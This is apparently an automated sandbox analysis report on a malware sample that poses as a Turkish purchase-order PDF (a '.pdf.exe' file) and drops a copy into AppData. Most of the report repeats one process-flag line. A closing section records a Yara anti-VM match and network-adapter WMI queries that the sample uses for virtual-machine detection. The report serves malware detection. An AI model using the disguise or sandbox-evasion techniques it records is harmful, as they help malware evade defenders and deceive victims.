                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7192, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7644, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
